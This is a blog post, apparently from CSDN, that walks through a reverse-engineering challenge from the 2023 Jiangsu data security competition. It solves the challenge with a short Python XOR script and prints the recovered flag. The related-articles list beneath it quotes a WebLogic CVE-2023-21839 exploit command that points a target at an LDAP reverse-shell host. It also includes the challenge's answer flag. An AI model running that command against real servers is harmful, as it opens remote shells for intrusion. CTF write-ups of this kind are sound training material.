2023江苏省数据安全竞赛re复现

最新推荐文章于 2025-11-29 16:24:14 发布
原创 最新推荐文章于 2025-11-29 16:24:14 发布 · 546 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #安全

文章讲述了在2023年江苏省数据安全竞赛中的一道题目,涉及字符串加密和异或操作。解题过程包括对两个字符串(str1和str2)进行逐位异或运算,以及对str3和str4中的字符进行类似处理,最终得到flag。
该文章已生成可运行项目,

复现一道前几个月打的2023江苏省数据安全竞赛的逆向题

ezcalc

整体就异或

解题过程:
在这里插入图片描述

#第一段
flag1 = ''
str1 = [21, 25, 17, 2, 9, 7, 24, 10, 6, 14, 
  29, 5, 6, 16, 95, 95]
enc1 = [115, 117, 112, 101, 114, 99, 97, 108, 105, 102, 
  114, 97, 103, 105, 108, 105]
for i in range(len(enc1)):
    flag1 += chr(str1[i]^enc1[i])
print(flag1,end="")
#第二段
str2 = [75, 70, 95, 0, 2, 72, 17, 92, 82, 93, 
  27, 7, 86, 0, 14, 87]
enc2 = [115, 116, 105, 99, 101, 120, 112, 105, 97, 108, 
  105, 100, 111, 99, 105, 111]
for i in range(len(enc2)):
    for j in range(32,127):
        if enc2[i] ^ j == str2[i]:
            print(chr(j),end="")
#第三段
str3 = [117, 115, 99, 97, 110, 100, 121, 99]
enc3 = [ 0x0C, 0x04, 0x57, 0x02, 0x5C, 0x1C, 0x15, 0x53]
for i in range(len(str3)):
    for j in range(32,127):
        if str3[i] ^ j == enc3[i]:
            print(chr(j),end="")
#第四段
str4= [0x61,0x6e]
enc4 = [0x59,0x13]
for i in range(len(enc4)):
    for j in range(32,127):
        if str4[i] ^ j == enc4[i]:
            print(chr(j),end="")
#flag{dyfohoday36826cg0a531rc9cg8yw4c2xl08}
本文章已经生成可运行项目
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 2608
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
2024 江苏省第二届数据安全技术应用职业技能竞赛 例题 wp
焦虑的焦虑
07-23 5036
江苏省第二届数据安全技术应用职业技能竞赛
2024 江苏省第二届数据安全技术应用职业技能竞赛 初赛 部分wp
焦虑的焦虑
08-21 4184
江苏省第二届数据安全技术应用职业技能竞赛 初赛
2023苏密杯
weixin_49803180的博客
07-04 1826
昨天刚刚参加了,苏密杯的决赛,刚好有时间整理一下解题思路,当然当时只做了8题,其他都是后来得大神指点,才复现出来的。
2024年“羊城杯”粤港澳大湾区网络安全大赛WriteUp
Geek极安云科-致力于网络安全事业
08-31 2519
现在请你分析流量,统计出该公司内部员工的个人信息,由于某些员工没认真填写,导致某些数据是不符合数据规范的,因此需要进行数据清洗。中途遇到一个坑,换了两个解密软件都不行,都说AES秘钥需要128字节,浪费了半小时,由于前一天hvv通宵了,至此已经30个小时没有休息了,坐着睡着了两分钟,醒来马上开窍(垂死梦中惊坐起),换上我最常用的在线解密网站,KYE=DASCTF,直接解出flag。据题意,该文件为音频隐写,binwalk显示存在mysql索引文件,但是一直分离不出,其实是误报,被误导了好久浪费了很长时间。
51c大模型~合集125
whaosoft~aiotの开发板商城
05-08 3169
整个过程在与环境的互动中完成,环境负责验证任务的合理性和解答的正确性,并为模型提供奖励反馈。在这一范式下,研究团队训练了新的模型 Absolute Zero Reasoner(AZR),以代码执行器作为真实环境,自动生成并解决三类代码推理任务,涵盖归纳、演绎与溯因推理,依赖环境可验证的反馈实现稳定训练。在最核心的比较中,AZR-Coder-7B 在多个代码与数学推理基准上取得了当前同规模模型中的最优结果,不仅在总体平均分上领先,更在代码任务平均得分上超越了多个依赖人工任务训练的模型。他的导师是黄高教授。
“鹏城杯”网络安全竞赛开赛 复现真实网络靶场环境.pdf
09-20
“鹏城杯”网络安全竞赛开赛 复现真实网络靶场环境.pdf
CVE-2023-38831 漏洞复现:win10 压缩包挂马攻击剖析
xinyaoyaotu的博客
01-27 2710
在网络安全这片没有硝烟的战场上,新型漏洞如同隐匿的暗箭,时刻威胁着我们的数字生活。其中,CVE - 2023 - 38831 这个关联 Win10 压缩包挂马攻击的漏洞,自曝光以来便引发了安全界的高度关注。深入探究并复现这一漏洞,不仅能让我们洞悉攻击者的手段,更能助力我们筑牢防线,抵御此类威胁。CVE - 2023 - 38831 是 2023 年披露的一个高危安全漏洞,主要影响 Windows 10 系统。攻击者利用这一漏洞,精心炮制恶意压缩包。
CVE-2023-21839 weblogic rce漏洞复现
wutiangui的博客
11-04 2729
C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞。复现之前请务必切换路径到jdk路径下。
Python自动化测试框架开发
2509_93945719的博客
11-26 884
封装requests时踩过坑,最初简单包装成通用方法,后来发现不同模块需要不同的超时策略和重试机制。框架开发过程中最大的体会是:好的设计不是一次性完成的,而是在不断踩坑、重构中迭代出来的。记住,自动化测试的终极目标不是追求100%覆盖率,而是用最小成本快速发现质量问题。最直观的变化是测试周期从原来的3天缩短到8小时,版本发布再也不用全员熬夜了。pytest的夹具机制比unittest灵活太多,特别是parametrize参数化,能轻松实现数据驱动。决定动手搭个统一的测试框架,把乱七八糟的脚本规范起来。
Python Pandas多列合并成一长列(扁平化)
最新发布
视觉算法小趴菜的博客
11-29 364
本文介绍了Pandas中三种数据扁平化方法:melt()按变量名和值两列重组数据,concat()垂直拼接多列,stack()将多列转为单列。测试数据显示melt()保留原列名信息,concat()和stack()仅保留数值。三种方法各有特点,适用于不同的数据扁平化需求。
【推荐系统】深度学习训练框架(五):pyspark分布式TorchDistributor主从读取OSS文件认证机制
人工智能领域博客
11-28 1822
摘要: 本文详细解释了Spark Driver端与Worker端在OSS认证上的核心区别。Driver端通过Spark配置自动认证,而Worker端(独立Python进程)需显式提供认证信息。认证来源优先级为:1)Driver传递参数,2)环境变量,3)IAM角色。文章分析了架构差异导致的不同认证方式,并推荐从Driver传递认证信息的解决方案。当前实现已采用该方案,通过Spark配置或环境变量获取认证后传递给Worker进程,确保PyArrow能正确访问OSS数据。
收藏!软件测试面试题
2401_86705770的博客
11-26 693
作为一位过来人也是希望大家少走一些弯路,如果你不想再体验一次学习时找不到资料,没人解答问题,坚持几天便放弃的感受的话,在这里我给大家分享一些自动化测试的学习资源,希望能给你前进的路上带来帮助。
基于Python与Go构建云原生微服务自动化运维平台的架构设计思路实践策略与性能优化方法全流程解析
2501_94114213的博客
11-26 818
Python 提供灵活的任务调度与编排能力,Go 提供高并发、高吞吐的任务执行与采集能力。两者结合构建的云原生微服务运维平台能够在大规模环境下实现:自动化高可靠弹性扩展可观测高性能随着企业上云进程加速,Python + Go 的混合运维平台将成为云原生运维的标准实践方案。
遗留Python包中的漏洞代码可通过域名劫持攻击Python包索引
FreeBuf_的博客
11-28 406
遗留Python包漏洞可致供应链攻击,域名劫持风险威胁PyPI生态。
python自动化脚本-下载最新最全LPR
zhang_ruiqiang的博客
11-27 641
本文介绍了一个Python自动化脚本,用于从中国人民银行官网批量获取贷款市场报价利率(LPR)数据。通过分析网页结构,发现LPR数据分布在4个索引页面中,每个页面包含多个带有特定标题的链接。脚本使用BeautifulSoup解析网页,自动提取并存储所有LPR数据到本地文件,解决了手动下载效率低、易出错的问题。核心功能包括:页面URL自动生成、目标链接定位、数据内容提取和结果保存。该方案显著提高了数据采集效率,为金融数据分析提供了便利。
Python抓取ZLibrary元数据实战指南
yiruo250的博客
11-29 475
本文介绍使用Python抓取ZLibrary电子书元数据的技术方案。首先说明准备工作,包括Python环境配置、网页结构分析和反爬策略。详细讲解两种抓取方法:静态页面使用requests+BeautifulSoup解析,动态内容通过Selenium模拟浏览器操作。提供数据存储示例(CSV/JSON格式)和清洗技巧,并介绍异步抓取、Scrapy框架等高级优化方案。特别强调法律合规性,包括遵守robots.txt、控制请求频率及版权注意事项。附完整代码示例链接,为电子书数据分析提供技术参考。
智慧城市空气质量监测与分析:Python与Go构建高效环境管理系统
2501_94114979的博客
11-26 347
通过Python与Go结合,开发者可以构建智慧城市空气质量监控系统,实现实时数据采集、分析和可视化。异步处理、缓存和消息队列保障系统高效稳定,为城市环境治理和公共健康提供技术支持。
确保数据安全的漏洞复现策略与实践技巧
资源摘要信息:"强化漏洞复现数据安全:策略与实践" 网络安全领域中的漏洞复现是指模拟攻击场景,以复现已知漏洞的过程,它对于评估系统安全性、设计防护措施和修补漏洞至关重要。然而,在进行漏洞复现时,需要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

S0UL-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值